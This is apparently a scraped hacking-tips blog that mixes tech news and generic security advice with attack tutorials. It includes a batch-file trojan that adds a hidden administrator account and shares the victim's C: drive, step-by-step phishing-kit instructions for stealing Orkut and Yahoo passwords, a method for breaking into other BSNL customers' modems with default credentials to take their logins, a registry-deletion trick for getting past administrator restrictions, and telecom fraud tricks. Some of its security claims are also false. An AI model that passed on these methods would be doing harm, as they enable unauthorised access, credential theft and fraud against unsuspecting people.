Gmail Goes Offline.!!


Just Two days Before One More Feature was Added In Gmail i.e. You Can Access Your Mails While You Are Offline.!!!

Gmail implemented it successfully in its Gmail Labs and now its open to worldwide Gmail users. Gmail Offline Feature uses Gears which will download a local cache of your mail. Time for which user is connected to internet, cache is synchronized with Gmail Server's. Now if user gets disconnected from the internet, Gmail uses the data stored in the hard drive. While in the Offline mode we can even label the mails and also send a mail which gets sended when the user is connected to the internet next time.

With this Gmail targets mainly users who have less connection speed or the users who experiencing frequent connection Lost.

Check out its Video

Gmail's Official Announcement

Free hack IDEA Gprs for Delhi

IDEA FREE gprs 4 DELHI:

1.Keep balance 20 or 30 Rs

2.Then send ACTNET20 to 12345.

3.Rs.20 will deduct,after dat keep balance below Rs.19

& NJOY UR FREE SURFING !!

Free IDEA Gprs hack For Gujrat

HEre are the Settings:

IP & Port:0.0.0.0
APN:Internet
HP:Any
1st Send GP25 & After 8 Hrs send NOGP25.
Thats it!

Free IDEA Gprs hack For Kerala

IDEA Free GPRS 4 KERELA-

IP-10.4.45.21

port-8080/8002

apn-imis/internet/mmsc





Develop your own trojan(virus) in a .bat file.Show them your hack!!


Open a dos prompt we will only need a dos prompt and windows xp operating system

-Basics-

Opening a dos prompt -> Go to start and then execute and type
cmd and press ok

Now insert this command: net
And you will get something like this

NET [ ACCOUNTS | COMPUTER | CONFIG | CONTINUE | FILE | GROUP | HELP |
HELPMSG | LOCALGROUP | NAME | PAUSE | PRINT | SEND | SESSION |SHARE | START | STATISTICS | STOP | TIME | USE | USER | VIEW ]

In this tutorial we well use 3 of the commands listed here
they are: net user , net share and net send

We will select some of those commands and put them on a .bat file.

What is a .bat file?
Bat file is a piece of text that windows will execute as commands.
Open notepad and write there:

dir
pause

And now save this as test.bat and execute it.
Funny ain't it ?

---------------------- Starting -------------------
-:Server:-

The plan here is to share the C: drive and make a new user
with administrators access

Step one -> Open your dos prompt and a notepad.
The dos prompt will help you to test if the commands are ok
and the notepad will be used to make the .bat file.

Command #1-> net user prudhvi /add
What does this do? It makes a new user called prudhvi you can put
any name you want

Command #2-> net localgroup administrators prudhvi /add
This is the command that make your user go to the administrators
group.

Depending on the windows version the name will be different.
If you got an American version the name for the groups is Administrators and for the Portuguese version is administrators so it's nice you know which version of windows xp you are going to try share.

Command #3->net share system=C:\ /unlimited
This commands share the C: drive with the name of system.

Nice and those are the 3 commands that you will need to put on your .bat file and send to your friend.

Command #4-> net send urip I am ur server
Where it says urip you will insert your ip and when the victim opens the .bat it will send a message to your computer and you can check the victim ip.

->To see your ip in the dos prompt put this command: ipconfig

-----------------------: Client :----------------
Now that your friend opened your .bat file her system have the C: drive shared and a new administrator user.First we need to make a session with the remote computer with the net use command,you will execute these commands from your dos prompt.

Command #1 -> net use \\victimip neo
This command will make a session between you and the victim.Of course where it says victimip you will insert the victim ip.
Command #2-> explorer \\victimip\system
And this will open a explorer windows in the share system which is the C:/ drive with administrators access!!!

Have Fun !!!!

PHISHING - YOU MIGHT BE THE NEXT VICTIM..

EVERYBODY MUST HAVE READ THE TERM "PHISHING" ISN'T IT??? BUT DO YOU KNOW WHAT CYBER EXPERTS CALL IT AS OR HOW A USER IS CHEATED WITH PHISHING OR WHAT ARE THE TECHNIQUES USED AND FOR MANY MORE QUESTIONS LIKE THAT..HERE IS AN EXCELLENT PIECE OF INFORMATION ABOUT PHISHING.


WHAT IS PHISHING??

Phishing means fraudulently acquiring personal information of a user
Phishing is usually performed by getting the personal information of a user using online banking and then making wrong use of it

HOW IT IS CARRIED OUT??

In a classical Phishing attack the Phisher sends the user a spam email naming it to be from the trusted organization to verify his\her account The email also contains statements like ‘legal actions threatened’ or ‘closure of account may occur’

Such emails also usually contain links which need to be clicked When the user clicks on the link the sensitive information is provided to the phisher The personal Information is then used by the phisher for any bad deeds

Here are a few phrases a phisher uses

“verify your account”
Businesses should not ask you to send passwords, login names, Social Security numbers, or other personal information through e-mail

"If you don't respond within 48 hours, your account will be closed".These messages convey a sense of urgency so that you'll respond immediately without thinking. Phishing e-mail might even claim that your response is required because your account might have been compromised.

“Click on the below link to access your account”
these sort of links are usually masked links they might have names similar to the link of the organization but they point to a wrong destination
the masking can be seen when u bring the cursor near the link


A phisher may also use con artisted URLs such as the following are used instead of

http://www.microsoft.com/

http://www.micosoft.com/

http://www.mircosoft.com/

http://www.verify-microsoft.com/

HOW PHISHING MAY AFFECT YOU ?? (To Be Continued..)

Rate this Article Out of 10..


SOLUTION: PROTECT YOUR PC FROM WORM "DOWNADUP" OR CONFICKER



Some days back Giant security companies Discovered a "WORM" which spreads rapidly across the network which has left 3.5 millions windows users affected.The worm is referred as win32/Conficker Worm. READ MORE FROM MY EARLY POST


The Malicious worm "DOWNADUP" also refer as "CONFICKER" Seems to be infecting Every PC Worldwide.On a recent Study it was found that Uptil now Every 16th PC on this world wide network is already infected..!!IT spreads throught networks and autorun features in USB memory sticks,drives CD's and DVD's.Microsoft Even with its latest updates is unable to prevent the autorun Feature.

With that prospect keeping in my mind here i will be showing the steps of how to disble the autorun Feature.Go to following link in which the US COMPUTER EMERGENCY TEAM READINESS has also shown the method of disabling auto-run feature.LINK

HOW TO DISABLE AUTO-RUN FEATURE??

STEP1: Create a note-pad file consisiting of following text
REGEDIT4
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\IniFileMapping\Autorun.inf]
@="@SYS:DoesNotExist"

just copy the above text and save the notepad file as autorun.reg.

STEP-2:
Now you have to import the notepad file by opening registry editor.
thats it.

But remember that if still Auto-Run feature is not disable, shows that you are infected.
Pass this piece of information to all of your friends so that they can prevent their computer from getting infected

Phising....(HOW HACKER TAKES AWAY SOMEONE'S PASSWORD)

PHISHING 100% Working plzzzzz Dont MiSSSSsuse
guys heres the fake page of orkut,yahoo or request any other.
I WILL TRY TO COMPLETE



ORKUT PHISHING
DOWNLOAD THIS FILES

http://rapidshare.com/files/163459603/orkut.rar

AND UPLOAD ALL FILES TO WEBHOST

YAHOO
NEW YAHOO LOGIN PHISHER
LATEST YAHOO PHISHER

http://rapidshare.com/files/165982792/indian_yahoo_phisher.rar

it will update automatically
Upload all files in webhost
.html is ur phisher page and .txt is link for password

1. extract the files
2.create new account in any webhost
3.go to control panel then file manager and upload all files there
4. there is one .html(phishing page) and and one .txt(all passwords) file
5.give the .html file to victim by telling him some blah blah story
6.that's it



WEBHOSTS





Lol!! Just Go to the Login page.Right click your mouse and choose the view source page. Copy paste the entire text into a text file. Now go to the text file and the extension from .txt to .htm. Your fake page is ready for usage.

Incase you know php there is no need I should tell you further. For noobs first upload php file on to a hosting php supported website. Now go and Search for the suitable string in the login page whose clone is to be made where it says method/form action=" DB Address".Like in case of orkut



Now replace https://www.google.com/accounts/ServiceLoginAuth?service=orkut with the php file address that you have uploaded on a hosting site.Now upload the fake page also you made on to your hosting site and fetch the URL to the victim. Incase you are lucky and the victim logins you will get the password in a text file(you need to upload an additional text file also to get passwords(only for beginners not for advanced users of php) and in php file,code should be written such that it would redirect the ID and pass to this text file)

P.S:-For the complete set of phishing files of orkut download the file from the link below

http://www.freeuploading.com/files/6g010IE/orkut_rar.php


here is the sample....

Orkut Hacking 100% Working Dont Misuse
guys heres d fake page of orkut der are in total 4 files dat u simply need to upload on php supported webhost i suggest ripway

http://rapidshare.com/files/158948786/OFPFP.rar

extract the files den upload

u need not edit anything in dz

once u will upload the files u will see three files and der wud b a file

http://h1.ripway.com/xxxxxxxxxxx/confirm.html

where xxxxxxxxxxx is ur user name,u need to send this link to the victim making any story blah blah or wotever u make

once d victim enters d details in the page and d moment he will press enter u will get the username and password wotever he has typed in inside ur php supported webhost account in the fourth file dat wud be login.txt and now visible

after uploading the files you can try by typing anything in the user name and password

to view username and password click on the edit link of the login.txt file and initially this file wud be invisible u can make it visible by typing any details in the fake page urself


dont use this trick to hack unknown people,i know still many people wud do but think how u gonna feel wen ur account wud be hacked by sum1 else yup u can enjoy by hacking ur friends account still i know u will work according to ur wish

enjoy


wanna disable MS-DOS prompt..then here is d solution....

NoRealMode: Disable Single-Mode MS-DOS.
So you see if you have access to the Windows Registry, then you can easily create new DWORD values and set heir value to 1 for enabling the particular option and 0 for disabling the particular option. But Sometimes, access to the Windows Registry is blocked. So what do you do? Go to the Windows Directory and delete either user.dat or system.dat (These 2 files constitute the Windows Registry.) and reboot. As soon as Windows logs in, it will display a Warning Message informing you about an error in the Windows Registry. Simply ignore this Warning Message and Press CTRL+DEL+ALT to get out of this warning message.(Do not press OK) You will find that all restrictions have been removed.
The most kind of restriction found quite commonly is the Specific Folder Restriction, in which users are not allowed access to specific folders, the most common being the Windows folder, or sometimes even access to My Computer is blocked. In effect, you simply cannot seem to access the important kewl files which are needed by you to do remove restrictions. What do you? Well use the RUN
command. (START >RUN). But unfortunately a system administrator who is intelligent enough to block access to specific folder, would definitely have blocked access to the RUN command. Again we are stuck.
Windows is supposed to be the most User Friendly Operating System on earth. (At least Microsoft Says so.)
It gives the User an option to do the same thing in various ways. You see the RUN command is only the most convenient option of launching applications, but not the only way. In Windows you can create shortcuts to almost anything from a file, folder to a Web URL. So say your system administrator has blocked access to the c:\windows\system folder and you need to access it. What do you do? Simply create a Shortcut to it. To do this right click anywhere on the desktop and select New > Shortcut. A new window titled Create Shortcut pops up. Type in the path of the restricted folder you wish to access, in this case c:\windows\system. Click Next, Enter the friendly name of the Shortcut and then click Finish. Now you can access the restricted folder by simply double clicking on the shortcut icon. Well that shows how protected and secure *ahem Windows *ahem is.

jar file creation in java...not that tough believ me.....

go stepwise as follow in command prompt:-

-verbose

create-->
jar -cvf  jarfilename .jar folder/filelist
manifest -->meta-inf 

extract-->
jar -xvf jarfilename.jar

running-->

specify the main class in manifest file
Main-Class: packagename.filename
attach manifest again (create jar file again with manifest)
jar  -cvfm jarfilename.jar MANIFEST.MF folder/filelist 

java -jar jarfilename.jar arguments(if any)

if main class is not inside package , place your manifest inside the folder. go to the folder and then create your jar file
if it is in package,stay out of the package , place your manifest outside the package, create jar file staying outside the package

EverGreen Orkut Hacks..!!

"ORKUT" THE MOST USED SOCIAL NETWORKING WEBSITE IN INDIA, LEAVING BEHIND INTERNATIONALLY RECOGNIZED "FACEBOOK".
LAST YEAR IT WAS RANKED AS #2 SITE VISITED DAILY BY NETIZENS OF INDIA.


1) SCRAPBOY.

Its a fantastic Software which allows users to send instant SCRAPS to each other, just like we do in IM's.In Addition It also notifies the receiver about the scrap.Due to its typical Characteristic it even makes FOrmatting tools to work faster leading to speedy communication.

By installing it you are just a click away from scrapping to your friends which ultimately is a better option then opening 2-3 orkut pages for scrapping.iMagine sending Scraps in COlours in different text format, YEs this all you can do with this software.

Download it.

2)ORKUT TOOLBAR

Orkut toolbar HElps in formatting the text in orkut forums.In this you just have to type the text, select the part to be formatted and make changes in it by selecting the button from the toolbar, similar to formatting in MS word.It makes Posting links and signature much easier.

One of the best advantage of it is that it allows users to post images in the forum as well as you can upload a Flash movie.

Download it

3)SORKUT

Its basically a Google Search Forum, it allows to search within a specific forum.Its Generally used to identify or locate certain threads from the forums which are heavily loaded with many post.Hence basically its a cool tools For moderators for searching various threads.

Download it

4)ORKUT CUTE

A Great software for Orkutians as it provides the facilities which no other toolbar or software provides.Main attraction in it is that it allows us to change our background theme, which is not possible in any software or not in orkut also.Although Now a days orkut has some themes, but here you have no limits you can have any theme you want.

Some of the features like Alert when new scrap is sended, scrap to all friends and Receiving notifications when forums GEts updated, makes it the most popular among ORKUT users.

Download it

Rate this article out of 10..








BSNL Broadband Hacked..!!


Convert your 250HOME plan Into unlimited Plan..
IT seems to unbelievable isnt it..???But its True its been implemented and working soomthly.!! To configure this hack you need to have some basic information on how to configure your modem If you don't understand the following steps please dont imitate it otherwise it will lead to a problem or else if you dont understand some steps then you can write to me.
Steps:

1. Identify your IP address(dont knw visit @ whatismyip.com)

2.Download IP scanner.( i prefer angryziber.com/w/Download).

3.
Open IP scanner .GO to option/select port.Enter 80 in 1st option(enter post to scan)

4.In hostname option type ur ip.Click On the ip button next to host name on opening it will automatically fill the ip range.

5.In the first option Let ur original IP be but in the second option fill the ip greated then original.Now click Scan

6.IT will give you LIst of ips showing some ips green on left side.

7.Right click that ip and then to option 'open computer' & select browser

8.ASk for username and pass.GIve username :admin password:admin

9.if it doesnt respond take some other green IP.

10. When pages get open go to home & click Wan.Here uu will see user id and pass in coded form

11.To fetched actual passowrd download this soft from "(scanwith.com/X-Pass_download.htm)

12.Extract files from tht and run'X-pass'.Drag d 'x' icon in password filled and u will get the pass.

13. To check that pass go to http://10.240.160.195/webLogin.jsp

-------------------------THATS IT------------------DONE---------------------N'JOY-------------

ANY DIFFICULTY WRITE IT DOWN..






A New Worm Disabling Windows and Antivirus PAckages Affecting 3.5 millions users..!!


Some days back Giant security companies Discovered a "WORM" which spreads rapidly across the network which has left 3.5 millions windows users affected.The worm is referred as win32/Conficker Worm.

It also has some other vairants like win32.Downadup,Win32.Conficker .The Worm infects the computer by exploiting Windiows server service(SVC HOST) vulnerability and also spread through USB drivers, External Harddrives and MP3 Players.Moreover this worm gets constanly updated by downloading its newer version onto the infected machines making it difficult to remove.It was found that those computers which didnt had the latest version of anit-virus patch were infected by it.

Notice Published by Microsoft

To prevent your computer from getting infected download the following pathes released by the security companies

1. Symantec
2. Kaspersky
3. F-Secure
4. Bitdefender
5. Microsoft MSRT
6. Panda Security



Rate this article out of 10.

Tips To Prevent your Computer Being Hacked

Top 20 Security tools:
Nessus, Ethereal, Snort, Netcat, TCPdump, Hping, DNSiff, GFI LANguard, Ettercap, Nikto, John the Ripper, OpenSSH, TripWire, Kismet, NetFilter,
IP Filter, pf, fport, SAINT, OpenPGP.
These tools works on Linux and Xp.If your system is protected by these softwares then it is highly impossible for the hacker to hack your system.No virus can enter your system.
There are many steps to protect your system six steps are given below:

1.Install good Antivirus software.

2.Keep Operating system updates.
3.Get a Firewall system.
4.Conduct a vulnerability test.
5.Security policy.
6Avoid unnecessary network services.

1)Get a Firewall system:

The basic function of firewall is to regulate flow from computer networks to different trusted levels.Firewall without properconstruction can become useless.Firewall is the first and major thing to keep hackers,viruses away.Firewall acts as a wall between your system and hacker.Whenever hacker wants to enter your system without your permission firewalls block hacker.And it will not give permission until request is granted by you.Many hackers uses trick to get passwords and other valuable information.They create fake login page.For example let us take orkut fake login page and this page is similar to orkut main page.Hacker sends this page to person which he wants to hack.If the person enters his password then this password mails to users account.This is the way what the hackers use.If your system is protected with firewalls then it will not accept you to enter your password.It blocks all fake scripts.Similarly they use invisible keylogger to hack yahoo .If your system well protected by Firewalls then it is difficult to the hacker to hack your system.

2)Operating system update:

Upgrade operating system regularly and frequently to avoid hacking.If your operating system is Microsoft upgrade it regularly. Microsoft provides latest patches or versions of software,spywares and many anti hacking updates.So better to buy genuine Xp or Vista version and update it regularly to avoid hacking.If your operating system is genuine then they provide all free softwares for you. GFI events manager which provides wide login network that retrieves login from any operating system (i.e XP/WIN NT/VISTA) etc.It detect attacks and malicious network users from hacking.It catches hackers red handedly.

3)Install anti-virus software:

A virus is simply a program which infects files,drives and then router.Some virus are harmless .some may distroy files and some may steal your valuable data.If your system is connected to internet then you must use anti-virus software.When ever you switch on yourinternet huge amount of packets enters your system.Those packets contain viruses.As soon as they enter your system they hack cookies.Cookies contain valuable information.If your cookies got hacked then damm sure all your passwords got hacked.Few virus which are attached to emails and they request us to login our password.this is one type of hacking uses by the hacker.So in order to protect your passwords a good anti-virus software should be installed.

4)Conduct a vulnerability test:

This test is highly preferred by companies to protect valuable data from hacking.vulnerability test is little bit costly when compared to all other programs.But it provides high security than anti virus softwares.This tests mainly points to limitations and flaws in theprogram.The best method to conduct vulnerability is to contact system administrator or computer consultancy to provide access to your network or systems connected to your network for daily or twice a day.This provides high security to your files.Hacker cannot hack your valuable data.your system is totally protected.This is how to protect your system form hacker as well as from virus.

5)Avoid unnecessary network services:

While installing your system non essential softwares should be disabled or removed from system.If those softwares are not updated regularly it is better to uninstall that software.why because hacker always tries to find weakness in the softwares.After getting the weakness he uses those weakness for his advantages.This is what hacker do.After getting the weakness he may stole your passwordsand valuable data.So whenever you feel that this software is unnecessary better to remove those softwares.Or else it will create huge damage to you.

6)Security policy:

In this interconnected world every corporation needs high security policy.Threads exists not only from enterprises but also from
hackers.Companies,corporations must ensure confidentiality, integrity and availability of their data in their field.This data can be protected by high security policy. Symantec Enterprise security manager provides good security for confidential files.It is difficult to hack these files.As well as virus cannot enter in to user system.This is a good way to protect your system from hacking as well as from virus.


DID YOU LIKE THE CONTENT??

JUST IN.!! FREE SMS HACK FOR AIRTEL IDEA BSNL [2009]

GO FOR IT..

International Free SMS Center

+491722270300 -AIRTEL

+358405202999-BSNL


+352021100003-IDEA







DID IT WORK IN YOU OR NOT ???


Send Fake E-mails..!!

Yup..what you read is really true..!!  :)   Its been long I was searching for some technic to send fake emails,finally I found it.

Here it is..


But Before using this service following are the important think you must keep in mind..otherwise you will unknowingly break the cyberlaws bringing more troble to you.

1. USE ONLY AMONG YOUR FREINDS  FOR N'JOYMENT.

2.DO NOT USE IT TO TROUBLE OTHERS.

3.THE NAME THROUGH WHICH YOU WANT TO SEND EMAIL MUST BE A REGISTERED DOMAIN NAME.

---------------------------------THAT'S IT..!!!-------N'JOY------------------------------

RATE THIS CONTENT OUT OF 10..




BSNL FREE GPRS LATEST 2009 [MOBILE]

Share/Save/Bookmark
IT WAS FOUND THAT BSNL HAD A LOOP-HOLE WHEN TWO CONNECTIONS WERE MADE.ON THAT BASIS WE WILL BE ACHIEVING FREE GPRS..!!
STEPS:
1) CREATE TWO CONNECTIONS BS1 AND BS2 (ANY NAME YOU CAN HAVE)

2)NOW SELECT CONNECTION ABOVE MENTION "BS1" AS DEFAULT AND GET CONNECTED TO WEB(ie SELECT a link like wap.cellone.in the page will get open)

3)Just press the red button such that the “web” application goes in the background.Make sure that the gprs connection is still established with the web app. Two parallel lines on the top left of the screen will confirm this

4)Now open any other app that requires web connection like opera. Select "BS2" and open any other link like wap.google.com, u will get AN error.


ACCESS DENIED. Technical description: 403 Forbidden - You are not allowed to communicate with the requested resource.

5)Close opera and open web and open a site like esato.com

6)If everything is done as said here then esato will load and THATS IT! We have th
e whole internet!





AVOID VISITING PAK'S WEBSITES

Share/Save/Bookmark

YOU MIGHT NOT BE AWARE OF THE FACT : "A CYBER WAR IS ON A ROLL BETWEEN INDIA & PAKISTAN".
YOUR FIDUCIARY MIGHT BE HURT , BUT YES THIS IS THE TRUTH.IF WE BELIEVE THE EXPERTS THAN LACKS OF INDIAN COMPUTERS ARE NOW PART OF "ZOMBIE ARMY" i.e. UNDER PAK'S CONTROL.


WHO ARE THEY??

Experts believe they are non-other than Pakistani hackers who are preparing for Cyber attacks with India.Its allies in this war will be some Pak-based music and film websites that are very popular with indian internet users.Pakistani hackers are using this websites to target India-based computers and enter them by stealth to install malicious software.

WHAT HARM CAN IT CAUSE??

When we visit such websites a malicious software is installed on our computer.The installed software soon gets access to the personal information of the computer user stored on his machine,spies on his surfing habits and uses his computer to send more malicious spam to others-all without the knowledge of the users.!!It was found that the efficiency of their computers had declined after they downloaded a song from one of the Pakistan-website.

WHY ONLY PAK'S WEBSITES??

Many Pakistani websites are highly popular with Indian surfers because they offer downloads free of cost,popular hindi film songs and other Bollywood related stuffs such as wallpaper and photos.Say for example songs.pk has five mirrors sites which are visited by more than 12 lakh Indian users everyday to donwload music,wallpapers and other stuffs.

HOW TO PREVENT??

The only solutions liable to me is stop visiting such websites .Try to search some other websites which are having origin other than pak's websites.We can definitely get the replacement if we try to search in Google.Dont be reliable on your aniti-virus as experts says this are the latest viruses who's patches are still not available by the anti-virus companies and added that almost everyday a new computer virus is detected while downloading from this websites.

EXPERTS LANGUAGE..

Computer that are taken over by the malicious software are called "bots" which unwillingly became the part of large network of similarly infected computers.Experts called such networks as "botnets" or "zombie armies".

JOIN THE MOVEMENT "I CARE FOR MY COUNTRY" BY PASSING THIS PIECE OF INFORMATION TO ALL OF YOUR FRIENDS TO PREVENT INDIAN USERS FROM BECOMING VICTIMS.

TOP 10 THREATS TO YOUR PC

Share/Save/Bookmark

JUST A WEEK BACK A SEMINAR WAS HELD ON "CYBER SECURITY -NEED OF THE HOUR" WHICH HAD THE RHETORICIAN LIKE PAUL GOLLAMUDI(SENIOUR CONSULTANT AT SYMANTEC), MANISH LAHOTI (SALES HEAD CISCO) & AMISH SHAH(CTO NETSQUARE).

The seminar began with the note that "OVER 60 PERCENT OF CYBER SECURITY BREACHES IN INDIA REMAIN UNSOLVED,HIGHEST IN THE WORLD" pointed by Paul gollaamudi, furhther he added that genrally figure is less than 15 percent in other countries .He said risk profile in the online and communication world has change from hacking for fun to corporate episonage.Cyber crime has moved from disrupting operations to damaging trust and reputations.
Later Amish shah gave live demonstration of how laptops and desktops using broadband connections are vulnerable.Network security expert Manish lahoti discussed the ease with which Wi-Fi networks could be hacked into and what was needed to secure them.

IN THE DISCCUSION EXPERTS PIONTED OUT THE TOP 10 THREATS TO INTERNAL SECURITY.

1.The number of password-stealing websites will increase using fake sign-in pages for popular online services like eBay.

2.The volume of spam,particularly bandwidth eating image spam will continue to increase.

3.The popularity of video sharing on the web makes it inveitable that hackers will target MPEG files as means to distribute malicious code.
.
4. Mobile phones attacks will become more prevalent as mobile devices becomes "samarter" and more connected.

5. Vulnerabilities will continue to cause concern,fuelled by the under ground market

6. The number of rootkits on 32-bit p;atforms will increase but protection and remedidation capabilities will increase.

7.Viruses that modify exisitng files ion disk will make a comeback.

8.The use of computer programs that perform automate tasks will increase as tool favoured by hackers.

9.Identity theft and data loss will continue to be public issue at the root of these crimes is often computer theft,loss of backs-ups and compromised information systems.

10.Adware will go mainstream following the increase in commercial potentially unwanted programs(PUPs). 



DID YOU LIKED THIS ARTICLE??
 RATE THIS ARICLE  OUT OF 10.




 

INTERNET EXPLORER HACKED..


Share/Save/Bookmark

JUST RECENTLY THE NEWS STRIKE ACROSS THE WEB THAT THERE WERE MANY LOOP-HOLES IN THE INTERNET EXPLORER PARTICULARLY IN IE-7.


WHERE WAS THE LOOP-HOLE??

WHEN THE USER VISIT THE MALICIOUS SITE.(VISITED FREQUENTLY BY NEW USERS) USERS COMPUTER GETS INFECTED BY THE VIRUS AS NO SUCH PATCH IS AVAILABLE TO THE ANTI-VIRUS COMPANIES.

WHAT DAMAGE CAN VIRUS DO??

IT WAS FOUND THAT THE VIRUS FETCHES AWAY MAIL PASSWORDS,E-BANKING PASSWORD ,EVEN THE ONLINE GAME PASSWORD.

WHAT HAS MICROSOFT DONE FOR IT??

AFTER THE IMMENSE CRITICISM OF MICROSOFT IE, FINALLY IT CAME UP WITH PATCH TO PROTECT YOUR PC FROM SUCH ATTACKS.IT HAS ASKED THE USERS OF IE TO "RUN AND NOT TO WALK TO INSTALLED IT."

GET THE PATCH FIXED

AFTER ALL THIS SECURITY EXPERTS HAS SUGGESTED TO USE FIREFOX OR CHROME
AS WEB BROWSER.

AIRTEL FREE GPRS HACKS is BACK..!! [2009]


This post is about the latest airtel gprs trick for free unlimited gprs usage.
Before I had the free airtel mobile office trick using teashark browser with which we can browse any sites for free and download free content.But airtel officials have fixed this gprs trick in many of the states,but now there is an new airtel free unlimited gprs trick using another wap browser called as ucweb.
ucweb uses certain servers that the airtel settings cant stop it from accessing an particular site.so give a try to it.install ucweb mobile browser on your mobile and check whether its working in your mobile phone.it works for me and my friends in tamilnadu.check in your mobile and post your comments whether it is working for you...thanks for reading.hope it works forever!




To download ucweb browser for your mobile phone click here